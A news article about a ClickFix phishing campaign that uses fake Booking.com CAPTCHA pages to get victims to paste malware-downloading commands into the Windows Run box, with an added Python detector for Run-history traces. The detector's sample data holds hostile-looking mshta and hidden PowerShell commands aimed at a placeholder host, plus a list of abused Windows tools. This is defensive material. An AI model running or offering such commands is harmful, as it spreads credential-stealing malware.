Booking.com users are being targeted by yet another phishing campaign designed to steal data, login credentials, and more. Microsoft Threat Intelligence spotted the ongoing attack targeting users and hospitality organizations worldwide, but there are some tell-tale signs.

Yet Another Phishing Campaign Targets Booking.com

Microsoft Threat Intelligence first spotted this Booking.com phishing campaign in December 2024, but it remains active and continues to claim victims in numerous countries around the world. The campaign uses a social engineering technique known as ClickFix, which tricks users into clicking through fake error messages and running commands that download malware. Microsoft states:

In the ClickFix technique, a threat actor attempts to take advantage of human problem-solving tendencies by displaying fake error messages or prompts that instruct target users to fix issues by copying, pasting, and launching commands that eventually result in the download of malware.

Flow chart showing infection chain in Booking.com phishing campaign

This campaign isn’t very different from your typical phishing attack. The victim receives an email that appears to come from Booking.com, containing a malicious link or a link embedded in a PDF file that supposedly takes the user to the website to resolve the issue.

However, where this campaign does differ is what happens when you click the link. Instead of instantly downloading malware, you’re taken to a CAPTCHA page to “verify” your identity. This CAPTCHA instructs you to open a Windows Run window and then input the command the scammers provide.

Example of the Booking.com scam page, as documented by Microsoft Threat Intelligence.

The command is automatically copied to your clipboard when the CAPTCHA page appears, and the on-screen instructions walk you through pressing the Windows key + R shortcut to open the Run window, pasting the command with the Ctrl + V shortcut, and running it by pressing Enter. Because the user launches the payload themselves rather than the browser downloading it, the attack sidesteps automated defenses such as antivirus programs, firewalls, and other security controls that would otherwise block an unsolicited download.

This command downloads and runs the main malicious payload: malware that can steal financial data and credentials. The payload delivers multiple malware families, including XWorm, Lumma Stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT.
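As an added illustration (not code from the article or from Microsoft), here is a small Python detector a responder could run over an exported Run dialog history: Windows records what a user typed into Win + R under the RunMRU registry key, so a pasted ClickFix command leaves a trace there. The sample entries and the example.invalid domain below are constructed placeholders, not real indicators.

```python
import re

# Constructed sample of the Run dialog history, as stored under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
# Each lettered value holds one command followed by "\1"; MRUList lists the
# letters most-recent-first. Domains are placeholders, not real indicators.
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "mshta https://example.invalid/verify\\1",
    "d": 'powershell -w hidden -c "start https://example.invalid/captcha"\\1',
}

# Script hosts and download tools a victim has no normal reason to type into Run.
INTERPRETER = re.compile(
    r"^(?:\S*\\)?(mshta|powershell|pwsh|cmd|curl|certutil|bitsadmin|"
    r"wscript|cscript|regsvr32|rundll32)(?:\.exe)?\b",
    re.IGNORECASE,
)
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
HIDDEN_OR_ENCODED = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|e(?:nc(?:odedcommand)?)?\s)", re.IGNORECASE
)
LURE_WORDS = re.compile(r"captcha|verif|robot|human", re.IGNORECASE)


def runmru_commands(values):
    """Return the Run dialog commands, most recent first, with the "\\1" suffix removed."""
    return [values[k].removesuffix("\\1") for k in values.get("MRUList", "") if k in values]


def clickfix_indicators(cmd):
    """Return the reasons one Run command looks like a ClickFix paste; [] if it looks benign."""
    reasons = []
    m = INTERPRETER.match(cmd.strip())
    if m:
        reasons.append(f"script host or download tool launched from Run: {m.group(1).lower()}")
    if REMOTE_URL.search(cmd):
        reasons.append("references a remote URL")
    if HIDDEN_OR_ENCODED.search(cmd):
        reasons.append("hidden window or encoded command")
    if LURE_WORDS.search(cmd):
        reasons.append("contains CAPTCHA/verification lure wording")
    # A bare interpreter name is normal admin behaviour; require it plus at least
    # one more trait (remote fetch, hiding, or lure text) before flagging.
    return reasons if m and len(reasons) >= 2 else []


def find_clickfix(values):
    """Return (command, reasons) for every suspicious entry in a RunMRU export."""
    return [(c, r) for c in runmru_commands(values) if (r := clickfix_indicators(c))]
```

On a live host the same logic applies to Sysmon process-creation events where explorer.exe is the parent of the interpreter.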

If You’re Unsure, Just Don’t Click

This is far from Booking.com’s first rodeo with phishing scams. The Telekopye scam targeting Booking.com, also in 2024, caught out thousands of unsuspecting vacationers.

So, before clicking on any links in an email, verify the sender’s email address; in most cases, a phishing email will not originate from the company’s official domain. You can also go directly to the website in question, in this case Booking.com, and resolve your issue there by contacting the company through its own channels.

Cybercriminals using CAPTCHAs to spread malware isn’t new either. Remember, CAPTCHAs are simple tests to verify that you’re human. A legitimate CAPTCHA never asks you to run a command or open any windows; if one does, you’re on a malicious website.